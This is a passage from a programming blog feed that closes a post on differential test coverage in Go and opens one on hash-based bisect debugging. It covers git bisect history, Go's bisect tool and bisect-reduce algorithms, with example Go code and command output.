In the resulting profile, “covered” (green) means it ran in the failing test but not the passing ones, making it something to take a closer look at.
Looking at the file list, only <code>natmul.go</code> has a non-zero coverage percentage, meaning it contains lines that are unique to the failing test.
<p>
<img name="diffcover2" class="center pad" width=627 height=653 src="diffcover2.png" srcset="diffcover2.png 1x, diffcover2@1.5x.png 1.5x, diffcover2@2x.png 2x">
<p>
If we open <code>natmul.go</code>, we can see various lines in red (“uncovered”).
<p>
<img name="diffcover3" class="center pad" width=659 height=583 src="diffcover3.png" srcset="diffcover3.png 1x, diffcover3@1.5x.png 1.5x, diffcover3@2x.png 2x">
<p>
These lines ran in passing tests but not in the failing test. They are exonerated, although the fact that the lines normally run but were skipped in the failing test may prompt useful questions about what logic led to them being skipped. In this case, it’s just that the test does not exercise them: the <code>nat.mul</code> method has not been called at all.
<p>
Scrolling down, we find the one section of green.
<p>
<img name="diffcover4" class="center pad" width=762 height=893 src="diffcover4.png" srcset="diffcover4.png 1x, diffcover4@1.5x.png 1.5x, diffcover4@2x.png 2x">
<p>
This code is where I inserted the bug: the <code>else</code> branch is missing <code>za.neg = false</code>, producing the <code>-0x0</code> in the test failure.
Differential coverage is cheap to compute and display, and when it’s right, it can save a lot of time.
Out of over 15,000 lines of code, differential coverage identified 10, including the two relevant ones.
<p>
Of course, this technique is not foolproof: a passing test can still execute buggy code if the
bug is data-dependent, or if the test is not sensitive to the specific mistake in the code.
But much of the time, the buggy code runs only in the failing tests.
In those cases, differential coverage pinpoints the code blocks that merit a closer look.
<p>
You can <a href="bigcover.html">see the full profile here</a>.
<p>
A simpler but still useful technique is to view the basic coverage profile for a single failing test.
That gives you an accurate picture of which sections of code ran in the test, which can guide your
debugging: code that didn’t run is not the problem.
And if you are confused about how exactly a particular function returned an error,
the coverage pinpoints the exact error line.
In the example above, the failing test covered only 4.7% of the code.
<p>
Differential coverage also works for passing tests. Want to find the <a href="httpcover.html">code that implements the SOCKS5 proxy in net/http</a>?
<pre>
$ <b>go test -short -skip=SOCKS5 -coverprofile=c1.prof net/http</b>
$ <b>go test -short -run=SOCKS5 -coverprofile=c2.prof net/http</b>
$ <b>(head -1 c1.prof; diff c[12].prof | sed -n 's/^> //p') >c3.prof</b>
$ <b>go tool cover -html=c3.prof</b>
</pre>
<p>
Have fun!
Hash-Based Bisect Debugging in Compilers and Runtimestag:research.swtch.com,2012:research.swtch.com/bisect2024-07-18T10:18:53-04:002024-07-18T10:20:53-04:00Binary search over program code or execution to find why a new library or compiler causes a failure.<style>
blockquote {
padding-left: 0.5em;
border-left-style: solid;
border-left-width: 4px;
border-left-color: #ccf;
}
</style>
<a class=anchor href="#setting_the_stage"><h2 id="setting_the_stage">Setting the Stage</h2></a>
<p>
Does this sound familar?
You make a change to a library to optimize its performance
or clean up technical debt
or fix a bug,
only to get a bug report:
some very large, incomprehensibly opaque test
is now failing.
Or you add a new compiler optimization with a similar result.
Now you have a major debugging job
in an unfamiliar code base.
<p>
What if I told you that a magic wand exists
that can pinpoint the relevant line of code or call stack
in that unfamiliar code base?
It exists.
It is a real tool, and I’m going to show it to you.
This description might seem a bit over the top,
but every time I use this tool, it really does feel like magic.
Not just any magic either, but the best kind of magic:
delightful to watch even when you know exactly how it works.
<a class=anchor href="#binary_search_and_bisecting_data"><h2 id="binary_search_and_bisecting_data">Binary Search and Bisecting Data</h2></a>
<p>
Before we get to the new trick, let’s take a look at some
simpler, older tricks.
Every good magician starts with mastery of the basic techniques.
In our case, that technique is binary search.
Most presentations of binary search talk about
finding an item in a sorted list,
but there are far more interesting uses.
Here is an example I wrote long ago for Go’s <a href="https://go.dev/pkg/sort/#Search"><code>sort.Search</code></a> documentation:
<pre>func GuessingGame() {
var s string
fmt.Printf("Pick an integer from 0 to 100.\n")
answer := sort.Search(100, func(i int) bool {
fmt.Printf("Is your number <= %d? ", i)
fmt.Scanf("%s", &s)
return s != "" && s[0] == 'y'
})
fmt.Printf("Your number is %d.\n", answer)
}
</pre>
<p>
If we run this code, it plays a guessing game with us:
<pre>% go run guess.go
Pick an integer from 0 to 100.
Is your number <= 50? y
Is your number <= 25? n
Is your number <= 38? y
Is your number <= 32? y
Is your number <= 29? n
Is your number <= 31? n
Your number is 32.
%
</pre>
<p>
The same guessing game can be applied to debugging.
In his <i>Programming Pearls</i> column titled “Aha! Algorithms”
in <i>Communications of the ACM</i> (September 1983),
Jon Bentley called binary search “a solution that looks for problems.”
Here’s one of his examples:<blockquote>
<p>
Roy Weil applied the technique [binary search]
in cleaning a deck of about a thousand punched cards that contained a single bad card.
Unfortunately the bad card wasn’t known by sight; it could only be identified by running
some subset of the cards through a program and seeing a wildly erroneous answer—this
process took several minutes. His predecessors at the task tried to solve it by running a
few cards at a time through the program, and were making steady (but slow)
progress toward a solution. How did Weil find the culprit in just ten runs of the program?</blockquote>
<p>
Obviously, Weil played the guessing game using binary search.
Is the bad card in the first 500? Yes. The first 250? No. And so on.
This is the earliest published description of debugging by binary search
that I have been able to find.
In this case, it was for debugging data.
<a class=anchor href="#bisecting_version_history"><h2 id="bisecting_version_history">Bisecting Version History</h2></a>
<p>
We can apply binary search to a program’s version history instead of data.
Every time we notice a new bug in an old program,
we play the guessing game “when did this program last work?”
<ul>
<li>
Did it work 50 days ago? Yes.
<li>
Did it work 25 days ago? No.
<li>
Did it work 38 days ago? Yes.</ul>
<p>
And so on,
until we find that the program last worked correctly 32 days ago,
meaning the bug was introduced 31 days ago.
<p>
Debugging through time with binary search is a very old trick,
independently discovered many times by many people.
For example, we could play the guessing game using
commands like
<code>cvs checkout -D '31 days ago'</code>
or Plan 9’s <a href="https://9fans.github.io/plan9port/man/man1/yesterday.html">more musical</a>
<code>yesterday -n 31</code>.
To some programmers, the techniques of using binary search
to debug data or debug through time seem
“<a href="https://groups.google.com/g/comp.compilers/c/vGh4s3HBQ-s/m/qmrVKmF5AgAJ">so basic that there is no need to write them down</a>.”
But writing a trick down is the first step to making sure everyone can do it:
magic tricks can be basic but not obvious.
In software, writing a trick down is also the first step to automating it and building good tools.
<p>
In the late-1990s, the idea of binary search over version history
was <a href="https://groups.google.com/g/comp.compilers/c/vGh4s3HBQ-s/m/Chvpu7vTAgAJ">written down at least twice</a>.
Brian Ness and Viet Ngo published
“<a href="https://ieeexplore.ieee.org/abstract/document/625082">Regression containment through source change isolation</a>” at COMPSAC ’97 (August 1997)
describing a system built at Cray Research that they used to deliver much more frequent non-regressing compiler releases.
Independently, Larry McVoy published a file “<a href="https://elixir.bootlin.com/linux/1.3.73/source/Documentation/BUG-HUNTING">Documentation/BUG-HUNTING</a>” in the Linux 1.3.73 release (March 1996).
He captured how magical it feels that the trick works even if you have no particular expertise in the code being tested:<blockquote>
<p>
This is how to track down a bug if you know nothing about kernel hacking.
It’s a brute force approach but it works pretty well. <br>
<br>
You need:
<ul>
<li>
A reproducible bug - it has to happen predictably (sorry)
<li>
All the kernel tar files from a revision that worked to the revision that doesn’t</ul>
<p>
You will then do:
<ul>
<li>
Rebuild a revision that you believe works, install, and verify that.
<li>
Do a binary search over the kernels to figure out which one
introduced the bug. I.e., suppose 1.3.28 didn’t have the bug, but
you know that 1.3.69 does. Pick a kernel in the middle and build
that, like 1.3.50. Build & test; if it works, pick the mid point
between .50 and .69, else the mid point between .28 and .50.
<li>
You’ll narrow it down to the kernel that introduced the bug. You
can probably do better than this but it gets tricky.</ul>
<p>
. . . <br>
<br>
My apologies to Linus and the other kernel hackers for describing this
brute force approach, it’s hardly what a kernel hacker would do. However,
it does work and it lets non-hackers help bug fix. And it is cool
because Linux snapshots will let you do this - something that you can’t
do with vender supplied releases.</blockquote>
<p>
Later, Larry McVoy created Bitkeeper,
which Linux used as its first source control system.
Bitkeeper provided a way to print the longest straight line
of changes through the directed acyclic graph of commits,
providing a more fine-grained timeline for binary search.
When Linus Torvalds created Git, he carried that idea forward
as <a href="https://github.com/git/git/commit/8b3a1e056f2107deedfdada86046971c9ad7bb87"><code>git rev-list --bisect</code></a>, which
enabled the same kind of manual binary search.
A few days after adding it, he <a href="https://groups.google.com/g/fa.linux.kernel/c/N4CqlNCvFCY/m/ItQoFhVZyJgJ">explained how to use it</a> on the Linux kernel mailing list:<blockquote>
<p>
Hmm.. Since you seem to be a git user, maybe you could try the git
"bisect" thing to help narrow down exactly where this happened (and help
test that thing too ;). <br>
<br>
You can basically use git to find the half-way point between a set of
"known good" points and a "known bad" point ("bisecting" the set of
commits), and doing just a few of those should give us a much better view
of where things started going wrong. <br>
<br>
For example, since you know that 2.6.12-rc3 is good, and 2.6.12 is bad,
you’d do <br>
<br>
git-rev-list --bisect v2.6.12 ^v2.6.12-rc3 <br>
<br>
where the "v2.6.12 ^v2.6.12-rc3" thing basically means "everything in
v2.6.12 but _not_ in v2.6.12-rc3" (that’s what the ^ marks), and the
"--bisect" flag just asks git-rev-list to list the middle-most commit,
rather than all the commits in between those kernel versions.</blockquote>
<p>
This response started a <a href="https://groups.google.com/g/fa.linux.kernel/c/cp6abJnEN5U/m/5Z5s14LkzR4J">separate discussion</a>
about making the process easier, which led eventually to the
<a href="https://git-scm.com/docs/git-bisect"><code>git bisect</code></a> tool that exists today.
<p>
Here’s an example. We tried updating to a newer version of Go
and found that a test fails.
We can use <code>git bisect</code> to pinpoint the specific commit that caused the failure:
<p>
<pre>% git bisect start master go1.21.0
Previous HEAD position was 3b8b550a35 doc: document run..
Switched to branch 'master'
Your branch is ahead of 'origin/master' by 5 commits.
Bisecting: a merge base must be tested
[2639a17f146cc7df0778298c6039156d7ca68202] doc: run rel...
% git bisect run sh -c '
git clean -df
cd src
./make.bash || exit 125
cd $HOME/src/rsc.io/tmp/timertest/retry
go list || exit 0
go test -count=5
'
</pre>
<p>
It takes some care to write a correct <code>git bisect</code> invocation,
but once you get it right, you can walk away while <code>git bisect</code>
works its magic.
In this case, the script we pass to <code>git bisect run</code> cleans out any stale files
and then builds the Go toolchain (<code>./make.bash</code>).
If that step fails, it exits with code 125,
a special inconclusive answer for <code>git bisect</code>:
something else is wrong with this commit and we can’t say
whether or not the bug we’re looking for is present.
Otherwise it changes into the directory of the failing test.
If <code>go list</code> fails, which happens if the bisect uses a version of Go that’s too old,
the script exits successfully, indicating that the bug is not present.
Otherwise the script runs <code>go test</code> and exits with the
status from that command. The <code>-count=5</code> is there because
this is a flaky failure that does not always happen: running five times
is enough to make sure we observe the bug if it is present.
<p>
When we run this command, <code>git bisect</code> prints a lot of output,
along with the output of our test script,
to make sure we can see the progress:
<pre>% git bisect run ...
...
go: download go1.23 for darwin/arm64: toolchain not available
Bisecting: 1360 revisions left to test after this (roughly 10 steps)
[752379113b7c3e2170f790ec8b26d590defc71d1]
runtime/race: update race syso for PPC64LE
...
go: download go1.23 for darwin/arm64: toolchain not available
Bisecting: 680 revisions left to test after this (roughly 9 steps)
[ff8a2c0ad982ed96aeac42f0c825219752e5d2f6]
go/types: generate mono.go from types2 source
...
ok rsc.io/tmp/timertest/retry 10.142s
Bisecting: 340 revisions left to test after this (roughly 8 steps)
[97f1b76b4ba3072ab50d0d248fdce56e73b45baf]
runtime: optimize timers.cleanHead
...
FAIL rsc.io/tmp/timertest/retry 22.136s
Bisecting: 169 revisions left to test after this (roughly 7 steps)
[80157f4cff014abb418004c0892f4fe48ee8db2e]
io: close PipeReader in test
...
ok rsc.io/tmp/timertest/retry 10.145s
Bisecting: 84 revisions left to test after this (roughly 6 steps)
[8f7df2256e271c8d8d170791c6cd90ba9cc69f5e]
internal/asan: match runtime.asan{read,write} len parameter type
...
FAIL rsc.io/tmp/timertest/retry 20.148s
Bisecting: 42 revisions left to test after this (roughly 5 steps)
[c9ed561db438ba413ba8cfac0c292a615bda45a8]
debug/elf: avoid using binary.Read() in NewFile()
...
FAIL rsc.io/tmp/timertest/retry 14.146s
Bisecting: 20 revisions left to test after this (roughly 4 steps)
[2965dc989530e1f52d80408503be24ad2582871b]
runtime: fix lost sleep causing TestZeroTimer flakes
...
FAIL rsc.io/tmp/timertest/retry 18.152s
Bisecting: 10 revisions left to test after this (roughly 3 steps)
[b2e9221089f37400f309637b205f21af7dcb063b]
runtime: fix another lock ordering problem
...
ok rsc.io/tmp/timertest/retry 10.142s
Bisecting: 5 revisions left to test after this (roughly 3 steps)
[418e6d559e80e9d53e4a4c94656e8fb4bf72b343]
os,internal/godebugs: add missing IncNonDefault calls
...
ok rsc.io/tmp/timertest/retry 10.163s
Bisecting: 2 revisions left to test after this (roughly 2 steps)
[6133c1e4e202af2b2a6d4873d5a28ea3438e5554]
internal/trace/v2: support old trace format
...
FAIL rsc.io/tmp/timertest/retry 22.164s
Bisecting: 0 revisions left to test after this (roughly 1 step)
[508bb17edd04479622fad263cd702deac1c49157]
time: garbage collect unstopped Tickers and Timers
...
FAIL rsc.io/tmp/timertest/retry 16.159s
Bisecting: 0 revisions left to test after this (roughly 0 steps)
[74a0e3160d969fac27a65cd79a76214f6d1abbf5]
time: clean up benchmarks
...
ok rsc.io/tmp/timertest/retry 10.147s
508bb17edd04479622fad263cd702deac1c49157 is the first bad commit
commit 508bb17edd04479622fad263cd702deac1c49157
Author: Russ Cox <rsc@golang.org>
AuthorDate: Wed Feb 14 20:36:47 2024 -0500
Commit: Russ Cox <rsc@golang.org>
CommitDate: Wed Mar 13 21:36:04 2024 +0000
time: garbage collect unstopped Tickers and Timers
...
This CL adds an undocumented GODEBUG asynctimerchan=1
that will disable the change. The documentation happens in
the CL 568341.
...
bisect found first bad commit
%
</pre>
<p>
This bug appears to be caused by my new
garbage-collection-friendly timer implementation that will be in Go 1.23.
<i>Abracadabra!</i>
<a class=anchor href="#new_trick"><h2 id="new_trick">A New Trick: Bisecting Program Locations</h2></a>
<p>
The culprit commit that <code>git bisect</code> identified is a significant change to the timer
implementation.
I anticipated that it might cause subtle test failures,
so I included a <a href="https://go.dev/doc/godebug">GODEBUG setting</a>
to toggle between the old implementation and the new one.
Sure enough, toggling it makes the bug disappear:
<pre>% GODEBUG=asynctimerchan=1 go test -count=5 # old
PASS
ok rsc.io/tmp/timertest/retry 10.117s
% GODEBUG=asynctimerchan=0 go test -count=5 # new
--- FAIL: TestDo (4.00s)
...
--- FAIL: TestDo (6.00s)
...
--- FAIL: TestDo (4.00s)
...
FAIL rsc.io/tmp/timertest/retry 18.133s
%
</pre>
<p>
Knowing which commit caused a bug, along with minimal information
about the failure, is often enough to help identify the mistake.
But what if it’s not?
What if the test is large and complicated and entirely code you’ve never seen before,
and it fails in some inscrutable way that doesn’t seem to have anything
to do with your change?
When you work on compilers or low-level libraries, this happens quite often.
For that, we have a new magic trick: bisecting program locations.
<p>
That is, we can run binary search on a different axis: over the <i>program’s code</i>, not its version history.
We’ve implemented this search in a new tool unimaginatively named <code>bisect</code>.
When applied to library function behavior like the timer change,
<code>bisect</code> can search over all stack traces leading to the new code,
enabling the new code for some stacks and disabling it for others.
By repeated execution, it can narrow the failure down to enabling
the code only for one specific stack:
<pre>% go install golang.org/x/tools/cmd/bisect@latest
% bisect -godebug asynctimerchan=1 go test -count=5
...
bisect: FOUND failing change set
--- change set #1 (disabling changes causes failure)
internal/godebug.(*Setting).Value()
/Users/rsc/go/src/internal/godebug/godebug.go:165
time.syncTimer()
/Users/rsc/go/src/time/sleep.go:25
time.NewTimer()
/Users/rsc/go/src/time/sleep.go:145
time.After()
/Users/rsc/go/src/time/sleep.go:203
rsc.io/tmp/timertest/retry.Do()
/Users/rsc/src/rsc.io/tmp/timertest/retry/retry.go:37
rsc.io/tmp/timertest/retry.TestDo()
/Users/rsc/src/rsc.io/tmp/timertest/retry/retry_test.go:63
</pre>
<p>
Here the <code>bisect</code> tool is reporting that disabling <code>asynctimerchan=1</code>
(that is, enabling the new implementation)
only for this one call stack suffices to provoke the test failure.
<p>
One of the hardest things about debugging is running a program
backward: there’s a data structure with a bad value,
or the control flow has zigged instead of zagged,
and it’s very difficult to understand how it could have gotten
into that state.
In contrast, this <code>bisect</code> tool is showing the stack at the moment
just <i>before</i> things go wrong:
the stack identifies the critical decision point that determines whether the
test passes or fails.
In contrast to puzzling backward,
it is usually easy to look forward
in the program execution to understand why this
specific decision would matter.
Also, in an enormous code base, the bisection has
identified the specific few lines where we should start debugging.
We can read the code responsible for that specific sequence of calls
and look into why the new timers would change the
code’s behavior.
<p>
When you are working on a compiler or runtime and cause
a test failure in an enormous, unfamiliar code base,
and then this <code>bisect</code> tool narrows down the cause to
a few specific lines of code, it is truly a magical experience.
<p>
The rest of this post explains the inner workings of
this <code>bisect</code> tool, which Keith Randall, David Chase, and I
developed and refined over the past decade of work on Go.
Other people and projects have realized the idea of
bisecting program locations too:
I am not claiming that we were the first to discover it.
However, I think we have developed the approach further
and systematized it more than others.
This post documents what we’ve
learned, so that others can build on our efforts rather than rediscover them.
<a class=anchor href="#example"><h2 id="example">Example: Bisecting Function Optimization</h2></a>
<p>
Let’s start with a simple example and work back up to stack traces.
Suppose we are working on a compiler and know that a test program
fails only when compiled with optimizations enabled.
We could make a list of all the functions in the program
and then try disabling optimization of functions one at a time
until we find a minimal set of functions (probably just one) whose
optimization triggers the bug.
Unsurprisingly, we can speed up that process
using binary search:
<ol>
<li>
Change the compiler to print a list of every function it considers for optimization.
<li>
Change the compiler to accept a list of functions where optimization is allowed.
Passing it an empty list (optimize no functions) should make the test pass,
while passing the complete list (optimize all functions) should make the test fail.
<li>
Use binary search to determine the shortest list prefix
that can be passed to the compiler to make the test fail.
The last function in that list prefix is one that must be optimized
for the test to fail
(but perhaps not the only one).
<li>
Forcing that function to always be optimized, we can repeat
the process to find any other functions that must also be
optimized to provoke the bug.</ol>
<p>
For example, suppose there are ten functions in the program
and we run these three binary search trials:
<p>
<img name="hashbisect0func" class="center pad" width=197 height=238 src="hashbisect0func.png" srcset="hashbisect0func.png 1x, hashbisect0func@1.5x.png 1.5x, hashbisect0func@2x.png 2x, hashbisect0func@3x.png 3x, hashbisect0func@4x.png 4x">
<p>
When we optimize the first 5 functions, the test passes. 7? fail. 6? still pass.
This tells us that the seventh function, <code>sin</code>, is one function that must
be optimized to provoke the failure.
More precisely, with <code>sin</code> optimized, we know that
no functions later in the list need to be optimized,
but we don’t know whether any of functions earlier in the list must also be optimized.
To check the earlier locations, we can run another binary search
over the other remaining six list entries, always adding <code>sin</code> as well:
<p>
<img name="hashbisect0funcstep2" class="center pad" width=218 height=180 src="hashbisect0funcstep2.png" srcset="hashbisect0funcstep2.png 1x, hashbisect0funcstep2@1.5x.png 1.5x, hashbisect0funcstep2@2x.png 2x, hashbisect0funcstep2@3x.png 3x, hashbisect0funcstep2@4x.png 4x">
<p>
This time, optimizing the first two (plus the hard-wired <code>sin</code>) fails,
but optimizing the first one passes,
indicating that <code>cos</code> must also be optimized.
Then we have just one suspect location left: <code>add</code>.
A binary search over that one-entry list (plus the two hard-wired <code>cos</code> and <code>sin</code>)
shows that <code>add</code> can be left off the list without losing the failure.
<p>
Now we know the answer: one locally minimal set of functions to optimize to cause
the test failure is <code>cos</code> and <code>sin</code>.
By locally minimal, I mean that removing any function from the set
makes the test failure disappear: optimizing <code>cos</code> or <code>sin</code> by itself is not enough.
However, the set may still not be globally minimal:
perhaps optimizing only <code>tan</code> would cause a different failure (or not).
<p>
It might be tempting to run the search more like a
traditional binary search, cutting the list being searched in half at each step.
That is, after confirming that the
program passes when optimizing the first half,
we might consider discarding that half of the list and continuing the binary search on the other half.
Applied to our example, that algorithm would run like this:
<p>
<img name="hashbisect0funcbad" class="center pad" width=290 height=237 src="hashbisect0funcbad.png" srcset="hashbisect0funcbad.png 1x, hashbisect0funcbad@1.5x.png 1.5x, hashbisect0funcbad@2x.png 2x, hashbisect0funcbad@3x.png 3x, hashbisect0funcbad@4x.png 4x">
<p>
The first trial passing would suggest the incorrect optimization is in the second
half of the list, so we discard the first half.
But now <code>cos</code> is never optimized (it just got discarded),
so all future trials pass too,
leading to a contradiction: we lost track of the way to make the program fail.
The problem is that discarding part of the list is only justified if we know that part doesn’t matter.
That’s only true if the bug is caused by optimizing a single function,
which may be likely but is not guaranteed.
If the bug only manifests when optimizing multiple functions at once,
discarding half the list discards the failure.
That’s why the binary search must in general be over list prefix lengths, not list subsections.
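<p>
To make that concrete, here is a minimal Go sketch (not the real tool) of one round of the prefix search from step 3 above. It assumes a predicate <code>buggy</code> like the one defined in the next section, and it assumes that allowing more functions to be optimized never hides the failure:
<pre>// shortestFailingPrefix returns the length of the shortest prefix of
// funcs whose optimization makes the test fail, or len(funcs)+1 if
// optimizing every function still passes. The last function in the
// returned prefix must be optimized to provoke the failure,
// though perhaps not by itself.
func shortestFailingPrefix(funcs []string) int {
	return sort.Search(len(funcs)+1, func(n int) bool {
		// Does the test fail when only the first n functions
		// may be optimized?
		return buggy(funcs[:n])
	})
}
</pre>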
<a class=anchor href="#bisect-reduce"><h2 id="bisect-reduce">Bisect-Reduce</h2></a>
<p>
The “repeated binary search” algorithm we just looked at does work,
but the need for the repetition suggests that binary search may not
be the right core algorithm. Here is a more direct algorithm,
which I’ll call the “bisect-reduce” algorithm, since it is a
bisection-based reduction.
<p>
For simplicity, let’s assume we have a global function <code>buggy</code>
that reports whether the bug is triggered when our change is
enabled at the given list of locations:
<pre>// buggy reports whether the bug is triggered
// by enabling the change at the listed locations.
func buggy(locations []string) bool
</pre>
<p>
<code>BisectReduce</code> takes a single input list <code>targets</code> for which
<code>buggy(targets)</code> is true and returns a locally minimal subset <code>x</code>
for which <code>buggy(x)</code> remains true. It invokes a more generalized
helper <code>bisect</code>, which takes an additional argument: a <code>forced</code>
list of locations to keep enabled during the reduction.
<pre>// BisectReduce returns a locally minimal subset x of targets
// where buggy(x) is true, assuming that buggy(targets) is true.
func BisectReduce(targets []string) []string {
return bisect(targets, []string{})
}
// bisect returns a locally minimal subset x of targets
// where buggy(x+forced) is true, assuming that
// buggy(targets+forced) is true.
//
// Precondition: buggy(targets+forced) = true.
//
// Postcondition: buggy(result+forced) = true,
// and buggy(x+forced) = false for any x ⊂ result.
func bisect(targets []string, forced []string) []string {
if len(targets) == 0 || buggy(forced) {
// Targets are not needed at all.
return []string{}
}
if len(targets) == 1 {
// Reduced list to a single required entry.
return []string{targets[0]}
}
// Split targets in half and reduce each side separately.
m := len(targets)/2
left, right := targets[:m], targets[m:]
leftReduced := bisect(left, slices.Concat(right, forced))
rightReduced := bisect(right, slices.Concat(leftReduced, forced))
return slices.Concat(leftReduced, rightReduced)
}
</pre>
<p>
Like any good divide-and-conquer algorithm, a few lines do quite a lot:
<ul>
<li>
<p>
If the target list has been reduced to nothing,
or if <code>buggy(forced)</code> (without any targets) is true,
then we can return an empty list.
Otherwise we know something from targets is needed.
<li>
<p>
If the target list is a single entry, that entry is what’s needed:
we can return a single-element list.
<li>
<p>
Otherwise, the recursive case: split the target list in half
and reduce each side separately. Note that it is important to
force <code>leftReduced</code> (not <code>left</code>) while reducing <code>right</code>.</ul>
<p>
Applied to the function optimization example, <code>BisectReduce</code> would end up at a
call to
<pre>bisect([add cos div exp mod mul sin sqr sub tan], [])
</pre>
<p>
which would split the targets list into
<pre>left = [add cos div exp mod]
right = [mul sin sqr sub tan]
</pre>
<p>
The recursive calls compute:
<pre>bisect([add cos div exp mod], [mul sin sqr sub tan]) = [cos]
bisect([mul sin sqr sub tan], [cos]) = [sin]
</pre>
<p>
Then the <code>return</code> puts the two halves together: <code>[cos sin]</code>.
<p>
The version of <code>BisectReduce</code> we have been considering is the shortest
one I know; let’s call it the “short algorithm”.
A longer version handles the “easy” case of the bug being
contained in one half before the “hard” one of needing
parts of both halves.
Let’s call it the “easy/hard algorithm”:
<pre>// BisectReduce returns a locally minimal subset x of targets
// where buggy(x) is true, assuming that buggy(targets) is true.
func BisectReduce(targets []string) []string {
if len(targets) == 0 || buggy(nil) {
return nil
}
return bisect(targets, []string{})
}
// bisect returns a locally minimal subset x of targets
// where buggy(x+forced) is true, assuming that
// buggy(targets+forced) is true.
//
// Precondition: buggy(targets+forced) = true,
// and buggy(forced) = false.
//
// Postcondition: buggy(result+forced) = true,
// and buggy(x+forced) = false for any x ⊂ result.
// Also, if there are any valid single-element results,
// then bisect returns one of them.
func bisect(targets []string, forced []string) []string {
if len(targets) == 1 {
// Reduced list to a single required entry.
return []string{targets[0]}
}
// Split targets in half.
m := len(targets)/2
left, right := targets[:m], targets[m:]
// If either half is sufficient by itself, focus there.
if buggy(slices.Concat(left, forced)) {
return bisect(left, forced)
}
if buggy(slices.Concat(right, forced)) {
return bisect(right, forced)
}
// Otherwise need parts of both halves.
leftReduced := bisect(left, slices.Concat(right, forced))
rightReduced := bisect(right, slices.Concat(leftReduced, forced))
return slices.Concat(leftReduced, rightReduced)
}
</pre>
<p>
The easy/hard algorithm has two benefits and one drawback compared to the short algorithm.
<p>
One benefit is that the easy/hard algorithm more directly maps to our intuitions
about what bisecting should do:
try one side, try the other, fall back to some combination of both sides.
In contrast, the short algorithm always relies on the general case
and is harder to understand.
<p>
Another benefit of the easy/hard algorithm is that
it guarantees to find a single-culprit answer when one exists.
Since most bugs can be reduced to a single culprit,
guaranteeing to find one when one exists makes for
easier debugging sessions.
Supposing that optimizing <code>tan</code> would have triggered
the test failure,
the easy/hard algorithm would try
<pre>buggy([add cos div exp mod]) = false // left
buggy([mul sin sqr sub tan]) = true // right
</pre>
<p>
and then would discard the left side, focusing on the right side
and eventually finding <code>[tan]</code>, instead of <code>[sin cos]</code>.
<p>
The drawback is that because the easy/hard algorithm doesn’t often rely
on the general case, the general case needs more careful testing
and is easier to get wrong without noticing.
For example, Andreas Zeller’s 1999 paper
“<a href="https://dl.acm.org/doi/10.1145/318774.318946">Yesterday, my program worked. Today, it does not. Why?</a>”
gives what should be the easy/hard version of the bisect-reduce algorithm
as a way to bisect over independent program changes,
except that the algorithm has a bug:
in the “hard” case, the <code>right</code> bisection forces <code>left</code> instead of <code>leftReduced</code>.
The result is that if there are two culprit pairs crossing
the <code>left</code>/<code>right</code> boundary, the reductions can
choose one culprit from each pair instead of a matched pair.
Simple test cases are all handled by the easy case, masking the bug.
In contrast, if we insert the same bug into the general case of the short algorithm,
very simple test cases fail.
<p>
Real implementations are better served by the easy/hard algorithm,
but they must take care to implement it correctly.
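<p>
A cheap way to build that confidence is to run the reduction against synthetic <code>buggy</code> predicates with known culprit sets and check the postcondition directly. The sketch below assumes <code>buggy</code> has been made a replaceable function value (<code>var buggy func([]string) bool</code>) rather than the plain function declared earlier; a fuller test would also use culprit sets that straddle the split, such as two crossing pairs, to catch mistakes like the one just described.
<pre>func TestBisectReducePair(t *testing.T) {
	// Synthetic predicate: the failure appears only when both
	// cos and sin are enabled, mirroring the example above.
	buggy = func(locs []string) bool {
		have := map[string]bool{}
		for _, loc := range locs {
			have[loc] = true
		}
		return have["cos"] && have["sin"]
	}
	targets := []string{"add", "cos", "div", "exp", "mod",
		"mul", "sin", "sqr", "sub", "tan"}
	got := BisectReduce(targets)
	if !buggy(got) {
		t.Fatalf("BisectReduce = %v, which does not trigger the bug", got)
	}
	// Local minimality: removing any one element must make the failure disappear.
	for i := range got {
		rest := slices.Concat(got[:i], got[i+1:])
		if buggy(rest) {
			t.Errorf("%v is not minimal: %v still fails", got, rest)
		}
	}
}
</pre>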
<a class=anchor href="#list-based_bisect-reduce"><h2 id="list-based_bisect-reduce">List-Based Bisect-Reduce</h2></a>
<p>
Having established the algorithm, let’s now turn to
the details of hooking it up to a compiler.
Exactly how do we obtain the list of source locations,
and how do we feed it back into the compiler?
<p>
The most direct answer is to implement one debug mode
that prints the full list of locations for the optimization
in question
and another debug mode that accepts a list
indicating where the optimization is permitted.
<a href="https://bernsteinbear.com/blog/cinder-jit-bisect/">Meta’s Cinder JIT for Python</a>,
published in 2021,
takes this approach for deciding which functions to compile with the JIT
(as opposed to interpret).
Its <a href="https://github.com/facebookincubator/cinder/blob/cinder/3.10/Tools/scripts/jitlist_bisect.py"><code>Tools/scripts/jitlist_bisect.py</code></a>
is the earliest correct published version of the bisect-reduce algorithm
that I’m aware of,
using the easy/hard form.
<p>
The only downside to this approach is the potential size of the lists,
especially since bisect debugging is critical for reducing
failures in very large programs.
If there is some way to reduce the amount of data that must be
sent back to the compiler on each iteration, that would be helpful.
In complex build systems, the function lists may be too large
to pass on the command line or in an environment variable,
and it may be difficult or even impossible to arrange for a new input file
to be passed to every compiler invocation.
An approach that can specify the target list as a short command line argument
will be easier to use in practice.
<a class=anchor href="#counter-based_bisect-reduce"><h2 id="counter-based_bisect-reduce">Counter-Based Bisect-Reduce</h2></a>
<p>
Java’s HotSpot C2 just-in-time (JIT) compiler provided a
debug mechanism to control which functions to compile with the JIT,
but instead of using an explicit list of functions like in Cinder,
HotSpot numbered the functions as it considered them.
The compiler flags <code>-XX:CIStart</code> and <code>-XX:CIStop</code> set the
range of function numbers that were eligible to be compiled.
Those flags are
<a href="https://github.com/openjdk/jdk/blob/151ef5d4d261c9fc740d3ccd64a70d3b9ccc1ab5/src/hotspot/share/compiler/compileBroker.cpp#L1569">still present today (in debug builds)</a>,
and you can find uses of them in
<a href="https://bugs.java.com/bugdatabase/view_bug?bug_id=4311720">Java bug reports dating back at least to early 2000</a>.
<p>
There are at least two limitations to numbering functions.
<p>
The first limitation is minor and easily fixed:
allowing only a single contiguous range
enables binary search for a single culprit but
not the general bisect-reduce for multiple culprits.
To enable bisect-reduce, it would suffice
to accept a list of integer ranges, like <code>-XX:CIAllow=1-5,7-10,12,15</code>.
<p>
The second limitation is more serious:
it can be difficult to keep the numbering stable from run to run.
Implementation strategies like compiling functions in parallel
might mean considering functions in varying orders based
on thread interleaving.
In the context of a JIT, even threaded runtime execution
might change the order that functions are considered for compilation.
Twenty-five years ago, threads were rarely used and this limitation may not have been
much of a problem.
Today, assuming a consistent function numbering is a show-stopper.
